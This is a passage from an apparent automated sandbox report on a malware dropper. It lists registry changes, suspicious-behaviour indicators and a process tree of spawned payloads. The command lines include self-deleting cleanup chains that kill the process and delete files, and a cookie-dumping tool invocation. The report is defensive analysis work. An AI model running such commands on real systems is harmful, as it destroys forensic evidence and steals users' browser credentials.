\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance jingzhang.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGLockdown\00000000 = 8da07f0c6269d701 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2136 rUNdlL32.eXe 2136 rUNdlL32.eXe 3100 svchost.exe 3100 svchost.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 4840 WerFault.exe 2180 chrome.exe 2180 chrome.exe 728 arnatic_2.exe 728 arnatic_2.exe 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1392 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 728 arnatic_2.exe 3280 AJnVzDn5Yd7FO83Tk0TJdpGA.exe 696 frhhiwi 4748 fthhiwi 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 5744 explorer.exe 5744 explorer.exe 1392 Process not Found 1392 Process not Found 5744 explorer.exe 5744 explorer.exe 5744 explorer.exe 5744 explorer.exe 1392 Process not Found 1392 Process not Found 5744 explorer.exe 5744 explorer.exe 4152 explorer.exe 4152 explorer.exe 5744 explorer.exe 5744 explorer.exe 1392 Process not Found 1392 Process not Found 5744 explorer.exe 5744 explorer.exe 1392 Process not Found 1392 Process not Found 5744 explorer.exe 5744 explorer.exe 1040 explorer.exe 1040 explorer.exe 5744 explorer.exe 5744 explorer.exe 1392 Process not Found 1392 Process not Found 4152 explorer.exe 4152 explorer.exe 5744 explorer.exe 5744 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 4152 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe 1040 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1112 arnatic_5.exe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 3100 svchost.exe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 2136 rUNdlL32.eXe Token: SeDebugPrivilege 4840 WerFault.exe Token: SeDebugPrivilege 2444 arnatic_7.exe Token: SeDebugPrivilege 5036 4704316.exe Token: SeDebugPrivilege 756 1931028.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeCreatePagefilePrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeCreatePagefilePrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeCreatePagefilePrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeCreatePagefilePrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeCreatePagefilePrivilege 1392 Process not Found Token: SeAssignPrimaryTokenPrivilege 2592 svchost.exe Token: SeIncreaseQuotaPrivilege 2592 svchost.exe Token: SeSecurityPrivilege 2592 svchost.exe Token: SeTakeOwnershipPrivilege 2592 svchost.exe Token: SeLoadDriverPrivilege 2592 svchost.exe Token: SeSystemtimePrivilege 2592 svchost.exe Token: SeBackupPrivilege 2592 svchost.exe Token: SeRestorePrivilege 2592 svchost.exe Token: SeShutdownPrivilege 2592 svchost.exe Token: SeSystemEnvironmentPrivilege 2592 svchost.exe Token: SeUndockPrivilege 2592 svchost.exe Token: SeManageVolumePrivilege 2592 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2592 svchost.exe Token: SeIncreaseQuotaPrivilege 2592 svchost.exe Token: SeSecurityPrivilege 2592 svchost.exe Token: SeTakeOwnershipPrivilege 2592 svchost.exe Token: SeLoadDriverPrivilege 2592 svchost.exe Token: SeSystemtimePrivilege 2592 svchost.exe Token: SeBackupPrivilege 2592 svchost.exe Token: SeRestorePrivilege 2592 svchost.exe Token: SeShutdownPrivilege 2592 svchost.exe Token: SeSystemEnvironmentPrivilege 2592 svchost.exe Token: SeUndockPrivilege 2592 svchost.exe Token: SeManageVolumePrivilege 2592 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2592 svchost.exe Token: SeIncreaseQuotaPrivilege 2592 svchost.exe Token: SeSecurityPrivilege 2592 svchost.exe Token: SeTakeOwnershipPrivilege 2592 svchost.exe Token: SeLoadDriverPrivilege 2592 svchost.exe Token: SeSystemtimePrivilege 2592 svchost.exe Token: SeBackupPrivilege 2592 svchost.exe Token: SeRestorePrivilege 2592 svchost.exe Token: SeShutdownPrivilege 2592 svchost.exe Token: SeSystemEnvironmentPrivilege 2592 svchost.exe Token: SeUndockPrivilege 2592 svchost.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2184 firefox.exe 2184 firefox.exe 2184 firefox.exe 4904 chrome.exe 4904 chrome.exe 1392 Process not Found 1392 Process not Found 4904 chrome.exe 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 2564 36196613693.exe 2564 36196613693.exe 412 irecord.tmp -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2184 firefox.exe 2184 firefox.exe 2184 firefox.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2184 firefox.exe 6120 1E8B.exe 4148 2AD0.exe 1392 Process not Found 4996 MicrosoftEdge.exe 6064 MicrosoftEdgeCP.exe 6064 MicrosoftEdgeCP.exe 1708 MicrosoftEdge.exe 5596 MicrosoftEdgeCP.exe 5596 MicrosoftEdgeCP.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1392 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3260 wrote to memory of 2664 3260 setup_x86_x64_install - копия (20).exe 70 PID 3260 wrote to memory of 2664 3260 setup_x86_x64_install - копия (20).exe 70 PID 3260 wrote to memory of 2664 3260 setup_x86_x64_install - копия (20).exe 70 PID 2664 wrote to memory of 4016 2664 setup_installer.exe 77 PID 2664 wrote to memory of 4016 2664 setup_installer.exe 77 PID 2664 wrote to memory of 4016 2664 setup_installer.exe 77 PID 4016 wrote to memory of 1532 4016 setup_install.exe 97 PID 4016 wrote to memory of 1532 4016 setup_install.exe 97 PID 4016 wrote to memory of 1532 4016 setup_install.exe 97 PID 4016 wrote to memory of 3096 4016 setup_install.exe 96 PID 4016 wrote to memory of 3096 4016 setup_install.exe 96 PID 4016 wrote to memory of 3096 4016 setup_install.exe 96 PID 4016 wrote to memory of 3680 4016 setup_install.exe 95 PID 4016 wrote to memory of 3680 4016 setup_install.exe 95 PID 4016 wrote to memory of 3680 4016 setup_install.exe 95 PID 4016 wrote to memory of 3396 4016 setup_install.exe 93 PID 4016 wrote to memory of 3396 4016 setup_install.exe 93 PID 4016 wrote to memory of 3396 4016 setup_install.exe 93 PID 4016 wrote to memory of 3108 4016 setup_install.exe 91 PID 4016 wrote to memory of 3108 4016 setup_install.exe 91 PID 4016 wrote to memory of 3108 4016 setup_install.exe 91 PID 4016 wrote to memory of 3088 4016 setup_install.exe 90 PID 4016 wrote to memory of 3088 4016 setup_install.exe 90 PID 4016 wrote to memory of 3088 4016 setup_install.exe 90 PID 4016 wrote to memory of 1368 4016 setup_install.exe 80 PID 4016 wrote to memory of 1368 4016 setup_install.exe 80 PID 4016 wrote to memory of 1368 4016 setup_install.exe 80 PID 3680 wrote to memory of 3388 3680 cmd.exe 88 PID 3680 wrote to memory of 3388 3680 cmd.exe 88 PID 3680 wrote to memory of 3388 3680 cmd.exe 88 PID 3096 wrote to memory of 728 3096 cmd.exe 87 PID 3096 wrote to memory of 728 3096 cmd.exe 87 PID 3096 wrote to memory of 728 3096 cmd.exe 87 PID 1532 wrote to memory of 4032 1532 cmd.exe 82 PID 1532 wrote to memory of 4032 1532 cmd.exe 82 PID 1532 wrote to memory of 4032 1532 cmd.exe 82 PID 3396 wrote to memory of 3500 3396 cmd.exe 81 PID 3396 wrote to memory of 3500 3396 cmd.exe 81 PID 3396 wrote to memory of 3500 3396 cmd.exe 81 PID 3108 wrote to memory of 1112 3108 cmd.exe 83 PID 3108 wrote to memory of 1112 3108 cmd.exe 83 PID 3088 wrote to memory of 3940 3088 cmd.exe 84 PID 3088 wrote to memory of 3940 3088 cmd.exe 84 PID 3088 wrote to memory of 3940 3088 cmd.exe 84 PID 1368 wrote to memory of 3944 1368 cmd.exe 86 PID 1368 wrote to memory of 3944 1368 cmd.exe 86 PID 1368 wrote to memory of 3944 1368 cmd.exe 86 PID 3944 wrote to memory of 2444 3944 arnatic_7.exe 85 PID 3944 wrote to memory of 2444 3944 arnatic_7.exe 85 PID 3944 wrote to memory of 2444 3944 arnatic_7.exe 85 PID 3388 wrote to memory of 2136 3388 arnatic_3.exe 89 PID 3388 wrote to memory of 2136 3388 arnatic_3.exe 89 PID 3388 wrote to memory of 2136 3388 arnatic_3.exe 89 PID 3500 wrote to memory of 2724 3500 arnatic_4.exe 92 PID 3500 wrote to memory of 2724 3500 arnatic_4.exe 92 PID 3500 wrote to memory of 2724 3500 arnatic_4.exe 92 PID 2136 wrote to memory of 3100 2136 rUNdlL32.eXe 23 PID 2136 wrote to memory of 2488 2136 rUNdlL32.eXe 36 PID 3100 wrote to memory of 592 3100 svchost.exe 94 PID 3100 wrote to memory of 592 3100 svchost.exe 94 PID 3100 wrote to memory of 592 3100 svchost.exe 94 PID 2136 wrote to memory of 1008 2136 rUNdlL32.eXe 69 PID 3944 wrote to memory of 2444 3944 arnatic_7.exe 85 PID 3944 wrote to memory of 2444 3944 arnatic_7.exe 85
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1436
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3944
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1532
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:592
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2568
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2488
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2340
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2304
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1348
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1256
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1088
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:948 -
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:696
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4304 -
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4748
-
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3756 -
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:3236
-
-
-
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:3848
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
- Executes dropped EXE
PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:5916
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:4668
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5368 -
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:3084
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:5480 -
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:5932
-
-
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5940
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Suspicious use of SetThreadContext
PID:696 -
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:1072
-
-
-
C:\Users\Admin\AppData\Roaming\hjhhiwiC:\Users\Admin\AppData\Roaming\hjhhiwi2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6132
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:696
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:3852
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:1212 -
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵PID:6528
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵PID:6452
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:1008
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_4.exearnatic_4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:3144
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_1.exearnatic_1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4032 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_1.exe" & del C:\ProgramData\*.dll & exit2⤵PID:5836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im arnatic_1.exe /f3⤵
- Kills process with taskkill
PID:5892
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_5.exearnatic_5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1112 -
C:\Users\Admin\AppData\Roaming\7006689.exe"C:\Users\Admin\AppData\Roaming\7006689.exe"2⤵
- Executes dropped EXE
PID:4556 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4556 -s 9363⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
C:\Users\Admin\AppData\Roaming\2522565.exe"C:\Users\Admin\AppData\Roaming\2522565.exe"2⤵PID:4716
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
PID:4960
-
-
-
C:\Users\Admin\AppData\Roaming\4704316.exe"C:\Users\Admin\AppData\Roaming\4704316.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Users\Admin\AppData\Roaming\1931028.exe"C:\Users\Admin\AppData\Roaming\1931028.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_6.exearnatic_6.exe1⤵
- Executes dropped EXE
- Checks computer location settings
PID:3940 -
C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4876 -
C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3280
-
-
-
C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe"C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4988 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VJDpgX8XSvSeyBetT2C8kLfl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe" & del C:\ProgramData\*.dll & exit3⤵PID:5776
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VJDpgX8XSvSeyBetT2C8kLfl.exe /f4⤵
- Kills process with taskkill
PID:5820
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:5988
-
-
-
-
C:\Users\Admin\Documents\81SjQ8Y8_P7QY6tFe6NZs8vS.exe"C:\Users\Admin\Documents\81SjQ8Y8_P7QY6tFe6NZs8vS.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4224 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:4580
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2184 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.0.446543628\1936064724" -parentBuildID 20200403170909 -prefsHandle 1512 -prefMapHandle 1504 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 1592 gpu5⤵PID:4644
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.3.189641118\548267170" -childID 1 -isForBrowser -prefsHandle 5496 -prefMapHandle 5492 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 5508 tab5⤵PID:5544
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
